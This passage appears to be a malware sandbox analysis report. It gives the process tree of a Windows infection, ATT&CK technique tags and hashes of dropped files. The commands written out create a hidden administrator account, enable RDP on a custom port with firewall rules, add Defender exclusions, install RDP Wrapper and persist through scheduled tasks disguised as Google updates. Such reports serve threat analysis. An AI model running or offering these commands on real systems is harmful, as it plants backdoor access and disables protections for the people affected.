- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx4⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.comDesideri.exe.com G4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.comC:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exeC:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs7⤵
- System Location Discovery: System Language Discovery
PID:2312 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\1172.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs8⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"7⤵
- System Location Discovery: System Language Discovery
PID:1164 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\81.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"8⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"7⤵
- System Location Discovery: System Language Discovery
PID:1644 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineUA38"8⤵
- Scheduled Task/Job: Scheduled Task
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"7⤵PID:1944
-
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\321.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\979.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"8⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"7⤵
- System Location Discovery: System Language Discovery
PID:1280 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore48"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\ALKmVbB\FuaxiqhamB.bat EGocAeBsIQ UceSTiIhIr"7⤵
- System Location Discovery: System Language Discovery
PID:1556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"8⤵
- System Location Discovery: System Language Discovery
PID:2496 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic group where sid="S-1-5-32-544" get name /value9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"8⤵
- System Location Discovery: System Language Discovery
PID:1808 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic group where sid="S-1-5-32-555" get name /value9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
-
C:\Windows\SysWOW64\net.exenet user EGocAeBsIQ UceSTiIhIr /add8⤵PID:2452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add9⤵
- System Location Discovery: System Language Discovery
PID:1844
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators EGocAeBsIQ /add8⤵PID:2212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add9⤵
- System Location Discovery: System Language Discovery
PID:1012
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" EGocAeBsIQ /add8⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" EGocAeBsIQ /add9⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:1520
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited8⤵
- System Location Discovery: System Language Discovery
PID:2088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited9⤵
- System Location Discovery: System Language Discovery
PID:2492
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f8⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
PID:2536
-
-
C:\Windows\SysWOW64\reg.exereg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f8⤵
- System Location Discovery: System Language Discovery
PID:1600
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=133898⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1604
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2548
-
-
C:\Windows\SysWOW64\timeout.exeTimeout /t 158⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Windows\SysWOW64\fsutil.exefsutil dirty query C:8⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\sc.exesc queryex "TermService"8⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\find.exefind "STATE"8⤵
- System Location Discovery: System Language Discovery
PID:2436
-
-
C:\Windows\SysWOW64\find.exefind /v "RUNNING"8⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o8⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1752 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2424
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:1480
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c query session rdp-tcp8⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u8⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1280 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1748
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o8⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1600 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2188
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f8⤵PID:2256
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f8⤵
- System Location Discovery: System Language Discovery
PID:2140
-
-
C:\Windows\SysWOW64\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"8⤵
- System Location Discovery: System Language Discovery
PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"8⤵
- System Location Discovery: System Language Discovery
PID:352 -
C:\Windows\SysWOW64\cscript.execscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"9⤵
- System Location Discovery: System Language Discovery
PID:3068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul8⤵
- System Location Discovery: System Language Discovery
PID:1328 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"9⤵
- System Location Discovery: System Language Discovery
PID:2076
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "6.1.7601.17514" /f8⤵
- System Location Discovery: System Language Discovery
PID:1356
-
-
C:\Windows\SysWOW64\findstr.exefindstr /c:"[6.1.7601.17514]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"8⤵
- System Location Discovery: System Language Discovery
PID:1312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"7⤵
- System Location Discovery: System Language Discovery
PID:2480 -
C:\Windows\SysWOW64\cscript.execscript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\112.vbs" "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" "VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE5" "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll"8⤵
- System Location Discovery: System Language Discovery
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"7⤵
- System Location Discovery: System Language Discovery
PID:2132 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\ALKmVbB\dsn.dll" /tn "GoogleUpdateTaskMachineCore26"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2440
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2772
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
PID:2712
-
C:\Windows\system32\taskeng.exetaskeng.exe {51878247-83E0-4A77-BC99-21F58D94B95F} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]1⤵PID:3028
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\795.vbs" VlVoV1RWQlZWa2hpTWs1Q1dsVktlbE5XUlcxUk1GWk5aRlF4VmxreVZsUldSMnhLWVVWc2VVcHNRalZpUlhSSFVsZHpPV1Y2ClFYZFBWRWt3VGxSVmVFeFVRa1ZTVkVGMENrNUVWWGhOUXpGRFRVVkdSMHhVYXpWT1ZVMTRUMFZOZDFKcVRYcE5XREE52⤵
- Blocklisted process makes network request
PID:1740
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ALKmVbB\531.vbs" EGocAeBsIQ UceSTiIhIr "C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat"2⤵PID:3036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\ALKmVbB\FbUHLyhG.bat3⤵
- Drops file in System32 directory
PID:2292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"4⤵PID:1096
-
C:\Windows\System32\Wbem\WMIC.exewmic group where sid="S-1-5-32-544" get name /value5⤵PID:2460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"4⤵PID:888
-
C:\Windows\System32\Wbem\WMIC.exewmic group where sid="S-1-5-32-555" get name /value5⤵PID:2296
-
-
-
C:\Windows\system32\net.exenet user EGocAeBsIQ UceSTiIhIr /add4⤵PID:2536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user EGocAeBsIQ UceSTiIhIr /add5⤵PID:2492
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators EGocAeBsIQ /add4⤵PID:1280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators EGocAeBsIQ /add5⤵PID:1580
-
-
-
C:\Windows\system32\net.exenet localgroup Remote Desktop Users EGocAeBsIQ /add4⤵PID:580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Remote Desktop Users EGocAeBsIQ /add5⤵PID:2172
-
-
-
C:\Windows\system32\net.exenet accounts /maxpwage:unlimited4⤵PID:1028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited5⤵PID:2612
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v EGocAeBsIQ /t REG_DWORD /d "00000000" /f4⤵
- Hide Artifacts: Hidden Users
PID:2360
-
-
C:\Windows\system32\reg.exereg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f4⤵PID:2080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=133894⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Windows\system32\timeout.exeTimeout /t 154⤵
- Delays execution with timeout.exe
PID:2220
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Users
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Password Policy Discovery
1Permission Groups Discovery
1Local Groups
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD5b365fde3be7855f4254d1e4bba45d260
SHA1b56c6f0402b25c5d68e3a722144f5f4b5bb53d27
SHA2562a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360
SHA512d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026
-
Filesize
115KB
MD53b18b58b5b9d32e1e8dc3d4f681227cd
SHA1fd328b70f225a372903a3b36567779891f39dc32
SHA25679173702b2b38b8f9ad86ca394f3e8921d01c1aa0c7cfb2f64a760e2f2726cdf
SHA512ae15406e7e280ee448edfe35da0d5f84d392ebc5b33d730a9b240bdf3ec4f1a0b0e54c03af226cc3eca04ebffd9416a58d4a917dc537ffb0bd370f20417e10a4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5dc7cad1432e19f67280d036c8cfdeee2
SHA1137e5ada9f251f035623181706a5392a5f0428be
SHA256da7df464d0b2384703521f69305abeceaf2a27226ec5f2e4a1cfa60cf9522b0c
SHA512ea9c413de40322e43e84c4827be693cf2e4f06afef2ff1c1ece7242323dfc799bc688afbd204cc73dfaab03767fc17c3cf6f5da412e33eeb511b9a4b8717013b
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
2KB
MD5e526da1842354849cfc018128001a6b4
SHA1921f1ab5499eb550a351d4a394bd44df5d173ea5
SHA256563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14
SHA51279b4f306f9d89af12441fb6df2221a0ff8b9124ff23fadca037ed2319eb6a989bc94595598c49b61ed2e8dc12015b68190e59b7658eeaf1825d8d37de2586865
-
Filesize
9KB
MD5fdc134c640049724853a14b692623719
SHA1500ff9c4e30c34e4ab0ac0ce7c32e5f9116020a5
SHA256dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00
SHA5121b34d84d77cad63d69fcae45735c3616ff6bcac2176bfef1ce4e6d08f4bffa98a48aaa036b3f9674d516d923a353bc339290f7204436de9971e7b2ebf60f407f
-
Filesize
2KB
MD5d427d2ed9db86d08b38f5f8b5eec4493
SHA15cfe9f751bad99009abf1a642eec8f7c67870051
SHA2567d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512
SHA512fc381ec4b2dcdfd10d55d5d317e7a6011da9a859a7e98a84d49391637aa22eaf983875c9bf5bad8403b006566d4053d8f8946d3cbd52a433eac60c26f73cf659
-
Filesize
2KB
MD5193242114c1738d0ea04aa93659fdd5a
SHA1a929cc1cfbe44ba8a99117dfd7819776ab45d465
SHA256c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928
SHA51246825c3cc42c3c2e86a3890b29b3a2cf9b30e892d0d38bfb2e3334ffa3951b8f732b2786bdffa528ee6ff05c789c35e963f069d54680c3e16735165072e6fec4
-
Filesize
1KB
MD56d19b2702b77a20b89818484cbc83506
SHA1f42dbd3ab3c60ea9952e2a0f66826e153f89d943
SHA256042ef6e3349edef436e425a5ec5d7c23f49a93f2866ae31c10ada08e9e012d5f
SHA512184e47c8aaa2e8a391e08ba2c5932c6a16b620303c4c985df9e149770a866e8e3948a027150070044cdb56adfb11ad8b8cbd5979e78a0fbf444868cab9b4a285
-
Filesize
1KB
MD5705e82f324c49aae504bd529ec0f3330
SHA18fb0f70c93a7edb66de83142ed7abfafbc60bf81
SHA25631be73b1a36ba59416178bca73530ae0f9f1d7925d3f99ccba453c8dde1c21c9
SHA512ba45515a03c626ace1c67503e0d0990cd740767d857ecd9c8e0c7d651c84e4371549b00094bdf54168fbe4e47578fe3d7aa618be457fee1b8109b6dee2309c2a
-
Filesize
942B
MD54c5d0b302107e9ab3bf5d8c8144df394
SHA1e9f2208cf3b2385e49cccd0f766bb249c1f2e5bb
SHA256e2e7bd0d6c4fb8e0003570753f971e7d9676bf5edd409285ca612f2c9ab68730
SHA512e695c44ada405fbdf122bfc73cedfb1589fa63c82f6ffcde55bffad67200d27d5a8739469986bafa5857fc53154510140bac3642c83421965754015996db12a4
-
Filesize
837B
MD5e183f207373558455ab227584a4380a8
SHA1cd6289ccde5ba4af4accd1f7f2e2837fa34a75cb
SHA256be4a8c5c39c701c74e37e5f2f5669867e888d4fa8027986624142c12a9748a83
SHA5128837a3ba2634c5f658d3a319581b596681d6b214f2a81ce87f06bf524ed379ebaf79e0242b5bb37b117cf207f75efe47376851d8ddfd0e23aafad8f5f575ac90
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD53f66ec9fc93b0ad2a98da513dc00fddb
SHA140a3e322b16fca6a17d76445f3295bd70b926daa
SHA256ad4c230a69993f4bcb8ac00f43087b74ce87010b52ff74db6ed4707cd266d73b
SHA512bff5fff78a3f557752c87fd888f611e4b80755d00ebb46f4b9cd9a491ffc2377d250e493e28c3a613af9ca75b341d3dd368e22a4801701ee2988a30498ef66ca
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Abbassando.xltx
Filesize1.0MB
MD5e8b84f9aae8f56157bab0cb0ca34fe45
SHA108f3fae0a026c59d42d698eeceb2cde4cb5cc83e
SHA256276c2faaae669568b7655862d1aa85c7b711df06a4bea1cce5f6f5578d9d440e
SHA51203d80a1a53daa470f6a684f84609b3f744e524300fb6f7e693f0d102bd77ac1d140da200cb4b3df86e0477826bbd7eaba10a8e10d68b6ce378b55384cb18430a
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Attesa.xltx
Filesize1.1MB
MD51cbc6a4ec6699390f807eaca769b9e9e
SHA1265b0640a35ce9a161ec4c0cad5142d5cf7e9feb
SHA256747cfe4985ce5203e973f9be6ac7e43c6980babcb7203f1c989469670feec350
SHA51219fcba9aa6fa052c7ef032f694313b153835a78bbc7072b54f41f3ef9c8985a70b67c7de968312793c2a644d55411f0a058aab955945322069191b746ca44b47
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Esistenza.xltx
